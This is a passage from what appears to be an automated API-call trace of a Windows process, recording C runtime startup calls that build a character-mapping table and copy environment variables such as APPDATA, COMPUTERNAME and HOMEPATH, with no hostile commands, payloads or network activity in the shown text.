¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0096.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0096.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0096.330] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿKç]Cäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0096.363] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0096.363] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0096.363] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690f20) returned 0x80 [0096.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0096.419] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1f) returned 0x68eb58 [0096.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x68eb58, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0096.446] GetLastError () returned 0x0 [0096.446] SetLastError (dwErrCode=0x0) [0096.446] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4) returned 0x681a60 [0096.446] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x681a60) returned 0x4 [0096.446] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x681a60, Size=0x8) returned 0x681a60 [0096.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0096.446] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2b) returned 0x68b460 [0096.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x68b460, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 43 [0096.446] GetLastError () returned 0x0 [0096.446] SetLastError (dwErrCode=0x0) [0096.446] GetLastError () returned 0x0 [0096.446] SetLastError (dwErrCode=0x0) [0096.446] GetLastError () returned 0x0 [0096.446] SetLastError (dwErrCode=0x0) [0096.464] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x681a60) returned 0x8 [0096.464] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x681a60, Size=0xc) returned 0x691618 [0096.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0096.464] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x37) returned 0x691630 [0096.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x691630, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691618) returned 0xc [0096.465] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691618, Size=0x10) returned 0x691618 [0096.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0096.465] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3c) returned 0x682568 [0096.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x682568, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] GetLastError () returned 0x0 [0096.465] SetLastError (dwErrCode=0x0) [0096.465] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691618) returned 0x10 [0096.465] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691618, Size=0x14) returned 0x691670 [0096.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0096.466] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x31) returned 0x691690 [0096.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x691690, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691670) returned 0x14 [0096.466] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691670, Size=0x18) returned 0x691670 [0096.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.466] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x18) returned 0x6916d0 [0096.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x6916d0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 24 [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.466] SetLastError (dwErrCode=0x0) [0096.466] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691670) returned 0x18 [0096.467] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691670, Size=0x1c) returned 0x6916f0 [0096.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0096.467] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x24) returned 0x68ad90 [0096.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x68ad90, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.467] SetLastError (dwErrCode=0x0) [0096.467] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6916f0) returned 0x1c [0096.468] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6916f0, Size=0x20) returned 0x6916f0 [0096.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.468] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x14) returned 0x691670 [0096.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x691670, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.468] GetLastError () returned 0x0 [0096.468] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.469] GetLastError () returned 0x0 [0096.469] SetLastError (dwErrCode=0x0) [0096.470] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6916f0) returned 0x20 [0096.470] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6916f0, Size=0x24) returned 0x6916f0 [0096.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.470] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xd) returned 0x683220 [0096.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x683220, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.470] SetLastError (dwErrCode=0x0) [0096.470] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6916f0) returned 0x24 [0096.471] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6916f0, Size=0x28) returned 0x6916f0 [0096.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0096.471] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1a) returned 0x68eb80 [0096.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x68eb80, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 26 [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.471] SetLastError (dwErrCode=0x0) [0096.471] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6916f0) returned 0x28 [0096.472] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6916f0, Size=0x2c) returned 0x6916f0 [0096.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0096.472] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2e) returned 0x68b498 [0096.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x68b498, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", lpUsedDefaultChar=0x0) returned 46 [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.472] SetLastError (dwErrCode=0x0) [0096.472] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.473] SetLastError (dwErrCode=0x0) [0096.473] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] GetLastError () returned 0x0 [0096.474] SetLastError (dwErrCode=0x0) [0096.474] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6916f0) returned 0x2c [0096.474] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6916f0, Size=0x30) returned 0x6916f0 [0096.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 